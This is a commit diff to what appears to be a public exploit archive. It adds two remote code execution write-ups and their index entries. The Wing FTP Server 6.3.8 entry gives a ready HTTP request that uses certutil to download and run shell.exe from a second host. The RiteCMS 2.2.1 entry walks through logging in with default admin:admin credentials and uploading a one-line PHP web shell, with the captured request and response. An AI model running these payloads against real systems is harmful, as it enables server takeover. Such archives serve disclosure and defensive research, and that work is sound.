DB: 2020-07-17

2 changes to exploits/shellcodes RiteCMS 2.2.1 - Remote Code Execution Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
2020-07-17 05:02:11 +00:00 · 2020-07-17 05:02:11 +00:00 · da1d7301af
commit da1d7301af
parent 8bb6bd8fb0
3 changed files with 69 additions and 0 deletions
--- a/exploits/lua/webapps/48676.txt
+++ b/exploits/lua/webapps/48676.txt
@ -0,0 +1,27 @@
+# Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
+# Date: 2020-06-26
+# Exploit Author: v1n1v131r4
+# Vendor Homepage: https://www.wftpserver.com/
+# Software Link: https://www.wftpserver.com/download.htm
+# Version: 6.3.8
+# Tested on: Windows 10
+# CVE : --
+
+Wing FTP Server have a web console based on Lua language. For authenticated users, this console can be exploited to obtaining a reverse shell.
+
+1) Generate your payload (e.g. msfvenom)
+2) Send and execute via POST
+
+POST /admin_lua_.html?r=0.3592753444724336 HTTP/1.1
+Host: 192.168.56.105:5466
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.56.105:5466/admin_lua_term.html
+Content-Type: text/plain;charset=UTF-8
+Content-Length: 153
+Connection: close
+Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5
+
+command=os.execute('cmd.exe%20%2Fc%20certutil.exe%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.56.103%2Fshell.exe%20c%3A%5Cshell.exe%20%26shell.exe')
--- a/exploits/php/webapps/48675.txt
+++ b/exploits/php/webapps/48675.txt
@ -0,0 +1,40 @@
+# Exploit Title: RiteCMS 2.2.1 - Remote Code Execution
+# Date: 2020-07-03
+# Exploit Author: Enes Özeser
+# Vendor Homepage: http://ritecms.com/
+# Version: 2.2.1
+# Tested on: Linux
+
+1- Go to following url. >> http://(CHANGE-THIS)/ritecms/cms/
+2- Default username and password is admin:admin.
+3- Go "Filemanager" and press "Upload file" button.
+4- Choose your php webshell script and upload it. 
+
+((Example PHP Web Shell Code)) 
+<?php echo "<pre>"; system($_GET['cmd']); ?>
+
+5- You can find uploaded file there. >> http://(CHANGE-THIS)/ritecms/media/(FILE-NAME).php
+6- We can execute a command now. >> http://(CHANGE-THIS)/ritecms/media/(FILE-NAME).php?cmd=whoami
+
+(( REQUEST ))
+
+GET /ritecms/media/webshell.php?cmd=whoami HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/ritecms/cms/index.php?mode=filemanager&directory=media
+Connection: close
+Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u
+Upgrade-Insecure-Requests: 1
+
+(( RESPONSE ))
+
+HTTP/1.1 200 OK
+Date: Fri, 03 Jul 2020 21:10:13 GMT
+Server: Apache/2.4.43 (Debian)
+Content-Length: 14
+Connection: close
+Content-Type: text/html; charset=UTF-8
+<pre>www-data
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -42922,3 +42922,5 @@ id,file,description,date,author,type,platform,port
 48672,exploits/php/webapps/48672.txt,"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass",2020-07-15,KeopssGroup0day_Inc,webapps,php,
 48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,
 48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
+48675,exploits/php/webapps/48675.txt,"RiteCMS 2.2.1 - Remote Code Execution",2020-07-16,"Enes Özeser",webapps,php,
+48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,